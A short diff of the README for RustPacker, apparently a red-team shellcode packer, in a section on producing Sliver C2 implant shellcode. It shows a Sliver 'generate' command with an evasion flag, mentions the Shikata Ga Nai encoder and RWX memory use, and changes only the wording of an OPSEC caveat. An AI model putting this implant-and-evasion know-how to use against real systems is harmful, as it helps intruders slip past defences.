Nariod/RustPacker/README.md

 ### Sliver
 You can generate raw [Sliver](https://github.com/BishopFox/sliver) shellcode using Sliver's "--format shellcode".
 Ex:
 - `generate --mtls 127.0.0.1:443 --format shellcode --os windows --evasion`
 - You can use Shikata Ga Nai (SGN) Sliver encoder if prompted.
-RustPacker templates now use RWX memory regions (not OPSEC safe), which are required for SGN to work.
+RustPacker templates now use RWX memory regions (not really OPSEC safe), which are required for SGN to work.

 ## Install Rustpacker